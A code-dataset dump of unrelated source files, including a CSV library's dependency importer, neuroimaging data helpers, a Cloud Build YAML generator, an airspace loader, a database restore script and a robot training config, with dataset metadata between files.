g.addEdge(22, 23, 0)
g.addEdge(23, 27, 5)
g.addEdge(24, 25, 2)
g.addEdge(25, 26, 2)
g.addEdge(26, 27, 1)
print ("BFT:")
D = g.dijkstra(0)
for vertex in range(len(D)):
print(f"Distance from El Rosario to {metro[vertex]}, is {D[vertex]}")
|
none
| 1
| 3.769249
| 4
|
|
clevercsv/_optional.py
|
baldurmen/CleverCSV
| 989
|
6628112
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
"""Code for dealing with optional dependencies
The functionality in this file is largely based on similar functionality in the
Pandas library.
Author: <NAME>
Copyright: 2020, The Alan Turing Institute
License: See LICENSE file.
"""
import distutils.version
import importlib
# update this when changing setup.py
VERSIONS = {
"cleo": "0.7.6",
"clikit": "0.4.0",
"tabview": "1.4",
"pandas": "0.24.1",
"cchardet": "2.1.7"
}
def import_optional_dependency(name, raise_on_missing=True):
"""
Import an optional dependency.
This function is modelled on a similar function in the Pandas library.
Parameters
----------
name : str
Name of the module to import
raise_on_missing : bool
Whether to raise an error when the package is missing or to simply
return None.
Returns
-------
module : module
The module if importing was successful, None if
:attr:`raise_on_missing` is False.
Raises
------
ImportError
When a module can't be imported and :attr:`raise_on_missing` is True.
"""
msg = (
f"\nOptional dependency '{name}' is missing. You can install it using "
"pip or conda, or you can install CleverCSV with all of its optional "
"dependencies by running: pip install clevercsv[full]"
)
try:
module = importlib.import_module(name)
except ImportError:
if raise_on_missing:
raise ImportError(msg) from None
else:
return None
min_version = VERSIONS.get(name)
if not min_version:
return module
version = getattr(module, "__version__", None)
if version is None:
return
if distutils.version.LooseVersion(version) < min_version:
msg = (
f"CleverCSV requires version '{min_version}' or newer for "
"optional dependency '{name}'. Please update the package "
"or install CleverCSV with all its optional dependencies "
"using: pip install clevercsv[full]"
)
raise ImportError(msg)
return module
|
# -*- coding: utf-8 -*-
"""Code for dealing with optional dependencies
The functionality in this file is largely based on similar functionality in the
Pandas library.
Author: <NAME>
Copyright: 2020, The Alan Turing Institute
License: See LICENSE file.
"""
import distutils.version
import importlib
# update this when changing setup.py
VERSIONS = {
"cleo": "0.7.6",
"clikit": "0.4.0",
"tabview": "1.4",
"pandas": "0.24.1",
"cchardet": "2.1.7"
}
def import_optional_dependency(name, raise_on_missing=True):
"""
Import an optional dependency.
This function is modelled on a similar function in the Pandas library.
Parameters
----------
name : str
Name of the module to import
raise_on_missing : bool
Whether to raise an error when the package is missing or to simply
return None.
Returns
-------
module : module
The module if importing was successful, None if
:attr:`raise_on_missing` is False.
Raises
------
ImportError
When a module can't be imported and :attr:`raise_on_missing` is True.
"""
msg = (
f"\nOptional dependency '{name}' is missing. You can install it using "
"pip or conda, or you can install CleverCSV with all of its optional "
"dependencies by running: pip install clevercsv[full]"
)
try:
module = importlib.import_module(name)
except ImportError:
if raise_on_missing:
raise ImportError(msg) from None
else:
return None
min_version = VERSIONS.get(name)
if not min_version:
return module
version = getattr(module, "__version__", None)
if version is None:
return
if distutils.version.LooseVersion(version) < min_version:
msg = (
f"CleverCSV requires version '{min_version}' or newer for "
"optional dependency '{name}'. Please update the package "
"or install CleverCSV with all its optional dependencies "
"using: pip install clevercsv[full]"
)
raise ImportError(msg)
return module
|
en
| 0.711474
|
# -*- coding: utf-8 -*- Code for dealing with optional dependencies The functionality in this file is largely based on similar functionality in the Pandas library. Author: <NAME> Copyright: 2020, The Alan Turing Institute License: See LICENSE file. # update this when changing setup.py Import an optional dependency. This function is modelled on a similar function in the Pandas library. Parameters ---------- name : str Name of the module to import raise_on_missing : bool Whether to raise an error when the package is missing or to simply return None. Returns ------- module : module The module if importing was successful, None if :attr:`raise_on_missing` is False. Raises ------ ImportError When a module can't be imported and :attr:`raise_on_missing` is True.
| 3.092571
| 3
|
utils.py
|
Warvito/Normative-modelling-using-deep-autoencoders
| 12
|
6628113
|
<reponame>Warvito/Normative-modelling-using-deep-autoencoders
"""Helper functions and constants."""
from pathlib import Path
import warnings
import pandas as pd
import numpy as np
PROJECT_ROOT = Path.cwd()
def cliff_delta(X, Y):
"""Calculate the effect size using the Cliff's delta."""
lx = len(X)
ly = len(Y)
mat = np.zeros((lx, ly))
for i in range(0, lx):
for j in range(0, ly):
if X[i] > Y[j]:
mat[i, j] = 1
elif Y[j] > X[i]:
mat[i, j] = -1
return (np.sum(mat)) / (lx * ly)
def load_dataset(demographic_path, ids_path, freesurfer_path):
"""Load dataset."""
demographic_data = load_demographic_data(demographic_path, ids_path)
freesurfer_df = pd.read_csv(freesurfer_path)
dataset_df = pd.merge(freesurfer_df, demographic_data, on='Image_ID')
return dataset_df
def load_demographic_data(demographic_path, ids_path):
"""Load dataset using selected ids."""
demographic_df = pd.read_csv(demographic_path, sep='\t')
demographic_df = demographic_df.dropna()
ids_df = pd.read_csv(ids_path, usecols=['Image_ID'])
if 'Run_ID' in demographic_df.columns:
demographic_df['uid'] = demographic_df['participant_id'] + '_' + demographic_df['Session_ID'] + '_run-' + \
demographic_df['Run_ID'].apply(str)
ids_df['uid'] = ids_df['Image_ID'].str.split('_').str[0] + '_' + ids_df['Image_ID'].str.split('_').str[1]+ '_' + ids_df['Image_ID'].str.split('_').str[2]
dataset_df = pd.merge(ids_df, demographic_df, on='uid')
dataset_df = dataset_df.drop(columns=['uid'])
elif 'Session_ID' in demographic_df.columns:
demographic_df['uid'] = demographic_df['participant_id'] + '_' + demographic_df['Session_ID']
ids_df['uid'] = ids_df['Image_ID'].str.split('_').str[0] + '_' + ids_df['Image_ID'].str.split('_').str[1]
dataset_df = pd.merge(ids_df, demographic_df, on='uid')
dataset_df = dataset_df.drop(columns=['uid'])
else:
ids_df['participant_id'] = ids_df['Image_ID'].str.split('_').str[0]
dataset_df = pd.merge(ids_df, demographic_df, on='participant_id')
return dataset_df
COLUMNS_NAME = ['Left-Lateral-Ventricle',
'Left-Inf-Lat-Vent',
'Left-Cerebellum-White-Matter',
'Left-Cerebellum-Cortex',
'Left-Thalamus-Proper',
'Left-Caudate',
'Left-Putamen',
'Left-Pallidum',
'3rd-Ventricle',
'4th-Ventricle',
'Brain-Stem',
'Left-Hippocampus',
'Left-Amygdala',
'CSF',
'Left-Accumbens-area',
'Left-VentralDC',
'Right-Lateral-Ventricle',
'Right-Inf-Lat-Vent',
'Right-Cerebellum-White-Matter',
'Right-Cerebellum-Cortex',
'Right-Thalamus-Proper',
'Right-Caudate',
'Right-Putamen',
'Right-Pallidum',
'Right-Hippocampus',
'Right-Amygdala',
'Right-Accumbens-area',
'Right-VentralDC',
'CC_Posterior',
'CC_Mid_Posterior',
'CC_Central',
'CC_Mid_Anterior',
'CC_Anterior',
'lh_bankssts_volume',
'lh_caudalanteriorcingulate_volume',
'lh_caudalmiddlefrontal_volume',
'lh_cuneus_volume',
'lh_entorhinal_volume',
'lh_fusiform_volume',
'lh_inferiorparietal_volume',
'lh_inferiortemporal_volume',
'lh_isthmuscingulate_volume',
'lh_lateraloccipital_volume',
'lh_lateralorbitofrontal_volume',
'lh_lingual_volume',
'lh_medialorbitofrontal_volume',
'lh_middletemporal_volume',
'lh_parahippocampal_volume',
'lh_paracentral_volume',
'lh_parsopercularis_volume',
'lh_parsorbitalis_volume',
'lh_parstriangularis_volume',
'lh_pericalcarine_volume',
'lh_postcentral_volume',
'lh_posteriorcingulate_volume',
'lh_precentral_volume',
'lh_precuneus_volume',
'lh_rostralanteriorcingulate_volume',
'lh_rostralmiddlefrontal_volume',
'lh_superiorfrontal_volume',
'lh_superiorparietal_volume',
'lh_superiortemporal_volume',
'lh_supramarginal_volume',
'lh_frontalpole_volume',
'lh_temporalpole_volume',
'lh_transversetemporal_volume',
'lh_insula_volume',
'rh_bankssts_volume',
'rh_caudalanteriorcingulate_volume',
'rh_caudalmiddlefrontal_volume',
'rh_cuneus_volume',
'rh_entorhinal_volume',
'rh_fusiform_volume',
'rh_inferiorparietal_volume',
'rh_inferiortemporal_volume',
'rh_isthmuscingulate_volume',
'rh_lateraloccipital_volume',
'rh_lateralorbitofrontal_volume',
'rh_lingual_volume',
'rh_medialorbitofrontal_volume',
'rh_middletemporal_volume',
'rh_parahippocampal_volume',
'rh_paracentral_volume',
'rh_parsopercularis_volume',
'rh_parsorbitalis_volume',
'rh_parstriangularis_volume',
'rh_pericalcarine_volume',
'rh_postcentral_volume',
'rh_posteriorcingulate_volume',
'rh_precentral_volume',
'rh_precuneus_volume',
'rh_rostralanteriorcingulate_volume',
'rh_rostralmiddlefrontal_volume',
'rh_superiorfrontal_volume',
'rh_superiorparietal_volume',
'rh_superiortemporal_volume',
'rh_supramarginal_volume',
'rh_frontalpole_volume',
'rh_temporalpole_volume',
'rh_transversetemporal_volume',
'rh_insula_volume']
|
"""Helper functions and constants."""
from pathlib import Path
import warnings
import pandas as pd
import numpy as np
PROJECT_ROOT = Path.cwd()
def cliff_delta(X, Y):
"""Calculate the effect size using the Cliff's delta."""
lx = len(X)
ly = len(Y)
mat = np.zeros((lx, ly))
for i in range(0, lx):
for j in range(0, ly):
if X[i] > Y[j]:
mat[i, j] = 1
elif Y[j] > X[i]:
mat[i, j] = -1
return (np.sum(mat)) / (lx * ly)
def load_dataset(demographic_path, ids_path, freesurfer_path):
"""Load dataset."""
demographic_data = load_demographic_data(demographic_path, ids_path)
freesurfer_df = pd.read_csv(freesurfer_path)
dataset_df = pd.merge(freesurfer_df, demographic_data, on='Image_ID')
return dataset_df
def load_demographic_data(demographic_path, ids_path):
"""Load dataset using selected ids."""
demographic_df = pd.read_csv(demographic_path, sep='\t')
demographic_df = demographic_df.dropna()
ids_df = pd.read_csv(ids_path, usecols=['Image_ID'])
if 'Run_ID' in demographic_df.columns:
demographic_df['uid'] = demographic_df['participant_id'] + '_' + demographic_df['Session_ID'] + '_run-' + \
demographic_df['Run_ID'].apply(str)
ids_df['uid'] = ids_df['Image_ID'].str.split('_').str[0] + '_' + ids_df['Image_ID'].str.split('_').str[1]+ '_' + ids_df['Image_ID'].str.split('_').str[2]
dataset_df = pd.merge(ids_df, demographic_df, on='uid')
dataset_df = dataset_df.drop(columns=['uid'])
elif 'Session_ID' in demographic_df.columns:
demographic_df['uid'] = demographic_df['participant_id'] + '_' + demographic_df['Session_ID']
ids_df['uid'] = ids_df['Image_ID'].str.split('_').str[0] + '_' + ids_df['Image_ID'].str.split('_').str[1]
dataset_df = pd.merge(ids_df, demographic_df, on='uid')
dataset_df = dataset_df.drop(columns=['uid'])
else:
ids_df['participant_id'] = ids_df['Image_ID'].str.split('_').str[0]
dataset_df = pd.merge(ids_df, demographic_df, on='participant_id')
return dataset_df
COLUMNS_NAME = ['Left-Lateral-Ventricle',
'Left-Inf-Lat-Vent',
'Left-Cerebellum-White-Matter',
'Left-Cerebellum-Cortex',
'Left-Thalamus-Proper',
'Left-Caudate',
'Left-Putamen',
'Left-Pallidum',
'3rd-Ventricle',
'4th-Ventricle',
'Brain-Stem',
'Left-Hippocampus',
'Left-Amygdala',
'CSF',
'Left-Accumbens-area',
'Left-VentralDC',
'Right-Lateral-Ventricle',
'Right-Inf-Lat-Vent',
'Right-Cerebellum-White-Matter',
'Right-Cerebellum-Cortex',
'Right-Thalamus-Proper',
'Right-Caudate',
'Right-Putamen',
'Right-Pallidum',
'Right-Hippocampus',
'Right-Amygdala',
'Right-Accumbens-area',
'Right-VentralDC',
'CC_Posterior',
'CC_Mid_Posterior',
'CC_Central',
'CC_Mid_Anterior',
'CC_Anterior',
'lh_bankssts_volume',
'lh_caudalanteriorcingulate_volume',
'lh_caudalmiddlefrontal_volume',
'lh_cuneus_volume',
'lh_entorhinal_volume',
'lh_fusiform_volume',
'lh_inferiorparietal_volume',
'lh_inferiortemporal_volume',
'lh_isthmuscingulate_volume',
'lh_lateraloccipital_volume',
'lh_lateralorbitofrontal_volume',
'lh_lingual_volume',
'lh_medialorbitofrontal_volume',
'lh_middletemporal_volume',
'lh_parahippocampal_volume',
'lh_paracentral_volume',
'lh_parsopercularis_volume',
'lh_parsorbitalis_volume',
'lh_parstriangularis_volume',
'lh_pericalcarine_volume',
'lh_postcentral_volume',
'lh_posteriorcingulate_volume',
'lh_precentral_volume',
'lh_precuneus_volume',
'lh_rostralanteriorcingulate_volume',
'lh_rostralmiddlefrontal_volume',
'lh_superiorfrontal_volume',
'lh_superiorparietal_volume',
'lh_superiortemporal_volume',
'lh_supramarginal_volume',
'lh_frontalpole_volume',
'lh_temporalpole_volume',
'lh_transversetemporal_volume',
'lh_insula_volume',
'rh_bankssts_volume',
'rh_caudalanteriorcingulate_volume',
'rh_caudalmiddlefrontal_volume',
'rh_cuneus_volume',
'rh_entorhinal_volume',
'rh_fusiform_volume',
'rh_inferiorparietal_volume',
'rh_inferiortemporal_volume',
'rh_isthmuscingulate_volume',
'rh_lateraloccipital_volume',
'rh_lateralorbitofrontal_volume',
'rh_lingual_volume',
'rh_medialorbitofrontal_volume',
'rh_middletemporal_volume',
'rh_parahippocampal_volume',
'rh_paracentral_volume',
'rh_parsopercularis_volume',
'rh_parsorbitalis_volume',
'rh_parstriangularis_volume',
'rh_pericalcarine_volume',
'rh_postcentral_volume',
'rh_posteriorcingulate_volume',
'rh_precentral_volume',
'rh_precuneus_volume',
'rh_rostralanteriorcingulate_volume',
'rh_rostralmiddlefrontal_volume',
'rh_superiorfrontal_volume',
'rh_superiorparietal_volume',
'rh_superiortemporal_volume',
'rh_supramarginal_volume',
'rh_frontalpole_volume',
'rh_temporalpole_volume',
'rh_transversetemporal_volume',
'rh_insula_volume']
|
en
| 0.608765
|
Helper functions and constants. Calculate the effect size using the Cliff's delta. Load dataset. Load dataset using selected ids.
| 2.835362
| 3
|
ftl/ftl_node_benchmark_yaml.py
|
myelin/GoogleCloudPlatform-runtimes-common
| 0
|
6628114
|
"""A script to generate a cloudbuild yaml."""
import os
import yaml
import argparse
# Add directories for new tests here.
DEP_TESTS = ['small_app', 'medium_app', 'large_app']
APP_SIZE_TESTS = {
'scratch_small': '5',
'scratch_medium': '500',
'scratch_large': '50000'
}
_DATA_DIR = '/workspace/ftl/node/benchmark/data/'
_NODE_BASE = 'gcr.io/google-appengine/nodejs:latest'
parser = argparse.ArgumentParser(
description='Generate cloudbuild yaml for FTL benchmarking.')
parser.add_argument(
'--iterations',
action='store',
type=int,
default=5,
help='Number of times to build the image.')
parser.add_argument(
'--dep-test',
dest='dep_test',
action='store_true',
default=False,
help='Flag to enable to dependency test for the benchmark.')
parser.add_argument(
'--app-size-test',
dest='app_size_test',
action='store_true',
default=False,
help='Flag to enable the app size test for the benchmark.')
def main():
args = parser.parse_args()
if not (args.dep_test and args.app_size):
args.dep_test = True
args.app_size = True
cloudbuild_yaml = {
'steps': [
# We need to chmod in some cases for permissions.
{
'name': 'ubuntu',
'args': ['chmod', 'a+rx', '-R', '/workspace']
},
# Build the FTL image from source and load it into the daemon.
{
'name':
'gcr.io/cloud-builders/bazel',
'args': [
'run', '//ftl/node/benchmark:node_benchmark_image', '--',
'--norun'
],
},
# Build the node builder par file
{
'name': 'gcr.io/cloud-builders/bazel',
'args': ['build', 'ftl:node_builder.par']
},
]
}
# Generate a set of steps for each test and add them.
if args.dep_test:
for app_dir in DEP_TESTS:
cloudbuild_yaml['steps'] += dependency_test_step(
app_dir, args.iterations)
# Generate a set of steps for each test and add them.
if args.app_size_test:
for app_dir in APP_SIZE_TESTS:
cloudbuild_yaml['steps'] += app_size_test_step(
app_dir, args.iterations, APP_SIZE_TESTS[app_dir])
print yaml.dump(cloudbuild_yaml)
def dependency_test_step(app_dir, iterations):
name = 'gcr.io/ftl-node-test/benchmark_%s:latest' % app_dir
return [
# First build the image
{
'name':
'bazel/ftl/node/benchmark:node_benchmark_image',
'args': [
'--base', _NODE_BASE, '--name', name, '--directory',
os.path.join(_DATA_DIR + app_dir), '--description', app_dir,
'--iterations',
str(iterations)
]
}
]
def app_size_test_step(app_dir, iterations, gen_files):
name = 'gcr.io/ftl-node-test/benchmark_%s:latest' % app_dir
return [
# First build the image
{
'name':
'bazel/ftl/node/benchmark:node_benchmark_image',
'args': [
'--base', _NODE_BASE, '--name', name, '--directory',
os.path.join(_DATA_DIR + app_dir), '--description', app_dir,
'--iterations',
str(iterations), '--gen_files', gen_files
]
}
]
if __name__ == "__main__":
main()
|
"""A script to generate a cloudbuild yaml."""
import os
import yaml
import argparse
# Add directories for new tests here.
DEP_TESTS = ['small_app', 'medium_app', 'large_app']
APP_SIZE_TESTS = {
'scratch_small': '5',
'scratch_medium': '500',
'scratch_large': '50000'
}
_DATA_DIR = '/workspace/ftl/node/benchmark/data/'
_NODE_BASE = 'gcr.io/google-appengine/nodejs:latest'
parser = argparse.ArgumentParser(
description='Generate cloudbuild yaml for FTL benchmarking.')
parser.add_argument(
'--iterations',
action='store',
type=int,
default=5,
help='Number of times to build the image.')
parser.add_argument(
'--dep-test',
dest='dep_test',
action='store_true',
default=False,
help='Flag to enable to dependency test for the benchmark.')
parser.add_argument(
'--app-size-test',
dest='app_size_test',
action='store_true',
default=False,
help='Flag to enable the app size test for the benchmark.')
def main():
args = parser.parse_args()
if not (args.dep_test and args.app_size):
args.dep_test = True
args.app_size = True
cloudbuild_yaml = {
'steps': [
# We need to chmod in some cases for permissions.
{
'name': 'ubuntu',
'args': ['chmod', 'a+rx', '-R', '/workspace']
},
# Build the FTL image from source and load it into the daemon.
{
'name':
'gcr.io/cloud-builders/bazel',
'args': [
'run', '//ftl/node/benchmark:node_benchmark_image', '--',
'--norun'
],
},
# Build the node builder par file
{
'name': 'gcr.io/cloud-builders/bazel',
'args': ['build', 'ftl:node_builder.par']
},
]
}
# Generate a set of steps for each test and add them.
if args.dep_test:
for app_dir in DEP_TESTS:
cloudbuild_yaml['steps'] += dependency_test_step(
app_dir, args.iterations)
# Generate a set of steps for each test and add them.
if args.app_size_test:
for app_dir in APP_SIZE_TESTS:
cloudbuild_yaml['steps'] += app_size_test_step(
app_dir, args.iterations, APP_SIZE_TESTS[app_dir])
print yaml.dump(cloudbuild_yaml)
def dependency_test_step(app_dir, iterations):
name = 'gcr.io/ftl-node-test/benchmark_%s:latest' % app_dir
return [
# First build the image
{
'name':
'bazel/ftl/node/benchmark:node_benchmark_image',
'args': [
'--base', _NODE_BASE, '--name', name, '--directory',
os.path.join(_DATA_DIR + app_dir), '--description', app_dir,
'--iterations',
str(iterations)
]
}
]
def app_size_test_step(app_dir, iterations, gen_files):
name = 'gcr.io/ftl-node-test/benchmark_%s:latest' % app_dir
return [
# First build the image
{
'name':
'bazel/ftl/node/benchmark:node_benchmark_image',
'args': [
'--base', _NODE_BASE, '--name', name, '--directory',
os.path.join(_DATA_DIR + app_dir), '--description', app_dir,
'--iterations',
str(iterations), '--gen_files', gen_files
]
}
]
if __name__ == "__main__":
main()
|
en
| 0.858464
|
A script to generate a cloudbuild yaml. # Add directories for new tests here. # We need to chmod in some cases for permissions. # Build the FTL image from source and load it into the daemon. # Build the node builder par file # Generate a set of steps for each test and add them. # Generate a set of steps for each test and add them. # First build the image # First build the image
| 3.007129
| 3
|
traffic/data/airspaces/eurofirs.py
|
RaphaelDELAIR/traffic
| 209
|
6628115
|
<gh_stars>100-1000
import json
from pathlib import Path
from shapely.geometry import polygon, shape
from ...core.airspace import Airspace, ExtrudedPolygon
with Path(__file__).absolute().with_name("eurofirs.json").open("r") as fh:
fir = json.load(fh)
eurofirs = {
elt["properties"]["IDENT"]: Airspace(
name=elt["properties"]["NAME"][:-4], # Remove " FIR" at the end
elements=[
ExtrudedPolygon(
polygon.orient(shape(elt["geometry"]), -1),
int(elt["properties"]["LOWERLIMIT"]),
int(elt["properties"]["UPPERLIMIT"]),
)
],
type_=elt["properties"]["TYPE"],
designator=elt["properties"]["IDENT"],
properties=elt["properties"],
)
for elt in fir["features"]
}
|
import json
from pathlib import Path
from shapely.geometry import polygon, shape
from ...core.airspace import Airspace, ExtrudedPolygon
with Path(__file__).absolute().with_name("eurofirs.json").open("r") as fh:
fir = json.load(fh)
eurofirs = {
elt["properties"]["IDENT"]: Airspace(
name=elt["properties"]["NAME"][:-4], # Remove " FIR" at the end
elements=[
ExtrudedPolygon(
polygon.orient(shape(elt["geometry"]), -1),
int(elt["properties"]["LOWERLIMIT"]),
int(elt["properties"]["UPPERLIMIT"]),
)
],
type_=elt["properties"]["TYPE"],
designator=elt["properties"]["IDENT"],
properties=elt["properties"],
)
for elt in fir["features"]
}
|
en
| 0.840733
|
# Remove " FIR" at the end
| 2.712085
| 3
|
api/src/service/util/ImageService.py
|
SamuelJansen/idealizar-whats-app-manager-api
| 0
|
6628116
|
from io import BytesIO
import base64
from PIL import Image
from python_helper import Constant as c
from python_framework import Service, ServiceMethod
from dto import QRCodeDto
@Service()
class ImageService :
@ServiceMethod(requestClass=[str, str])
def save(self, imageAsBase64, pathWithNameAndExtension) :
image = Image.open(BytesIO(self.helper.base64.decode(imageAsBase64)))
image.save(pathWithNameAndExtension)
return image
|
from io import BytesIO
import base64
from PIL import Image
from python_helper import Constant as c
from python_framework import Service, ServiceMethod
from dto import QRCodeDto
@Service()
class ImageService :
@ServiceMethod(requestClass=[str, str])
def save(self, imageAsBase64, pathWithNameAndExtension) :
image = Image.open(BytesIO(self.helper.base64.decode(imageAsBase64)))
image.save(pathWithNameAndExtension)
return image
|
none
| 1
| 2.608981
| 3
|
|
scripts/restore_db.py
|
angry-tony/ceph-lcm-decapod
| 41
|
6628117
|
<reponame>angry-tony/ceph-lcm-decapod
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module containers script to perform restore of the Decapod."""
import argparse
import os
import os.path
import subprocess
import sys
DEFAULT_PROJECT_DIR = os.path.dirname(os.getcwd())
"""Name of the default project."""
def main():
options = get_options()
options.compose_file.close()
container_name = get_container_name(options)
command = [
"docker", "exec", "-i", container_name,
"decapod-admin", "db", "restore"
]
with open(options.backup_path, "rb") as result_fp:
with open(os.devnull) as dnull:
subprocess.check_call(
command,
stdin=result_fp,
stdout=dnull
)
def get_options():
parser = argparse.ArgumentParser(
description="Restore Decapod database on _working_ containers.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"-f", "--compose-file",
type=argparse.FileType(),
default=get_compose_file_path(),
help="Path to docker-compose.yml file."
)
parser.add_argument(
"-p", "--project-name",
default=get_project_name(),
help="The name of the project."
)
parser.add_argument(
"backup_path",
help="Path where to store backup."
)
return parser.parse_args()
def get_compose_file_path():
path = os.getenv("COMPOSE_FILE", os.path.join(
os.getcwd(), "docker-compose.yml"))
path = os.path.abspath(path)
return path
def get_project_name():
name = os.getenv("COMPOSE_PROJECT_NAME", os.path.dirname(os.getcwd()))
name = os.path.basename(name)
return name
def get_container_name(options):
command = [
"docker-compose",
"--project-name", options.project_name,
"--file", options.compose_file.name,
"ps", "-q", "admin"
]
output = subprocess.check_output(command).strip().decode("utf-8")
return output
if __name__ == "__main__":
sys.exit(main())
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module containers script to perform restore of the Decapod."""
import argparse
import os
import os.path
import subprocess
import sys
DEFAULT_PROJECT_DIR = os.path.dirname(os.getcwd())
"""Name of the default project."""
def main():
options = get_options()
options.compose_file.close()
container_name = get_container_name(options)
command = [
"docker", "exec", "-i", container_name,
"decapod-admin", "db", "restore"
]
with open(options.backup_path, "rb") as result_fp:
with open(os.devnull) as dnull:
subprocess.check_call(
command,
stdin=result_fp,
stdout=dnull
)
def get_options():
parser = argparse.ArgumentParser(
description="Restore Decapod database on _working_ containers.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"-f", "--compose-file",
type=argparse.FileType(),
default=get_compose_file_path(),
help="Path to docker-compose.yml file."
)
parser.add_argument(
"-p", "--project-name",
default=get_project_name(),
help="The name of the project."
)
parser.add_argument(
"backup_path",
help="Path where to store backup."
)
return parser.parse_args()
def get_compose_file_path():
path = os.getenv("COMPOSE_FILE", os.path.join(
os.getcwd(), "docker-compose.yml"))
path = os.path.abspath(path)
return path
def get_project_name():
name = os.getenv("COMPOSE_PROJECT_NAME", os.path.dirname(os.getcwd()))
name = os.path.basename(name)
return name
def get_container_name(options):
command = [
"docker-compose",
"--project-name", options.project_name,
"--file", options.compose_file.name,
"ps", "-q", "admin"
]
output = subprocess.check_output(command).strip().decode("utf-8")
return output
if __name__ == "__main__":
sys.exit(main())
|
en
| 0.81509
|
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. This module containers script to perform restore of the Decapod. Name of the default project.
| 2.301531
| 2
|
whdenovo/validate.py
|
shilpagarg/WHdenovo
| 45
|
6628118
|
<reponame>shilpagarg/WHdenovo
'''
Validate partitioning result for either simulated data or real data
'''
import sys, os
import re
import subprocess
from subprocess import PIPE
from . import validate_simulate
from . import validate_real
def valSim(path, pacbioFA):
whdenovoPath = '/'.join(sys.path[0].split('/')[:-1])
fileList = os.listdir(path)
readslist = []
allreadslist = []
for i in fileList:
if re.match(r'.*_block_*.allreads', i):
allreadslist.append(i)
subprocess.call('cat %s/bc1/*.allreads > %s/bc1/all.allreads'%(path, path), shell = True)
validate_simulate.compute_read_partitioning_accuracy('%s/bc1/all.allreads'%path)
#subprocess.call('python %s/src/validate_simulate.py %s/all.allreads'%(whdenovoPath, path), shell = True)
#subprocess.call("cat %s/bc1/all.allreads | cut -d' ' -f1 | sort -u | uniq > %s/bc1/all.tmpreads"%(path, path), shell = True)
#subprocess.call('python %s/src/get_unpartitioned.py %s/bc1/all.tmpreads %s'%(whdenovoPath, path, pacbioFA), shell = True)
def valReal(path, tag):
validate_real.compute_read_partitioning_accuracy(path, tag)
def add_arguments(parser):
arg = parser.add_argument
arg('-p', '--path', required = True, help = 'The output path of partitioning results.')
arg('-f', '--fasta', required = False, help = 'Required for simulated data validation.')
arg('-t', '--truth', required = False, help = 'Required for real data validation.')
def main(args):
if args.fasta != None and args.truth != None:
print('choose only one!')
elif args.fasta != None:
valSim(args.path, args.fasta)
else:
valReal(args.path, args.truth)
|
'''
Validate partitioning result for either simulated data or real data
'''
import sys, os
import re
import subprocess
from subprocess import PIPE
from . import validate_simulate
from . import validate_real
def valSim(path, pacbioFA):
whdenovoPath = '/'.join(sys.path[0].split('/')[:-1])
fileList = os.listdir(path)
readslist = []
allreadslist = []
for i in fileList:
if re.match(r'.*_block_*.allreads', i):
allreadslist.append(i)
subprocess.call('cat %s/bc1/*.allreads > %s/bc1/all.allreads'%(path, path), shell = True)
validate_simulate.compute_read_partitioning_accuracy('%s/bc1/all.allreads'%path)
#subprocess.call('python %s/src/validate_simulate.py %s/all.allreads'%(whdenovoPath, path), shell = True)
#subprocess.call("cat %s/bc1/all.allreads | cut -d' ' -f1 | sort -u | uniq > %s/bc1/all.tmpreads"%(path, path), shell = True)
#subprocess.call('python %s/src/get_unpartitioned.py %s/bc1/all.tmpreads %s'%(whdenovoPath, path, pacbioFA), shell = True)
def valReal(path, tag):
validate_real.compute_read_partitioning_accuracy(path, tag)
def add_arguments(parser):
arg = parser.add_argument
arg('-p', '--path', required = True, help = 'The output path of partitioning results.')
arg('-f', '--fasta', required = False, help = 'Required for simulated data validation.')
arg('-t', '--truth', required = False, help = 'Required for real data validation.')
def main(args):
if args.fasta != None and args.truth != None:
print('choose only one!')
elif args.fasta != None:
valSim(args.path, args.fasta)
else:
valReal(args.path, args.truth)
|
en
| 0.354997
|
Validate partitioning result for either simulated data or real data #subprocess.call('python %s/src/validate_simulate.py %s/all.allreads'%(whdenovoPath, path), shell = True) #subprocess.call("cat %s/bc1/all.allreads | cut -d' ' -f1 | sort -u | uniq > %s/bc1/all.tmpreads"%(path, path), shell = True) #subprocess.call('python %s/src/get_unpartitioned.py %s/bc1/all.tmpreads %s'%(whdenovoPath, path, pacbioFA), shell = True)
| 2.464684
| 2
|
AMR-Policies-Other/train_Maze.py
|
irom-lab/AMR-Policies
| 2
|
6628119
|
import Robot
import Environment
from Networks import *
import Train
import Task
import ray
import warnings
import torch as pt
# Learning Parameters **************************************************************************************************
num_epochs = 3000
max_m_dim = 300 # at the memory layer
batch_size = 250
input_dim = 1 # actions
output_dim = 17*4 + 1 # observations (RGB-D array size 17 + prev action)
horizon = 80
lr = 1e-4
rnn_horizon = 1 # = horizon if time-varying
reg = 0
load = False
load_file = None # for loading checkpoint models
seed = 42
print_int = 50
ckpt_int = 100
# Simulation Parameters ************************************************************************************************
params = {}
params['time_step'] = 0.1 # seconds
params['husky_velocity'] = 2 # meters per second
# ENVIRONMENT INFORMATION
params['y_max']= 10
params['y_min']= 0
params['x_min']= -5
params['x_max']= 5.5
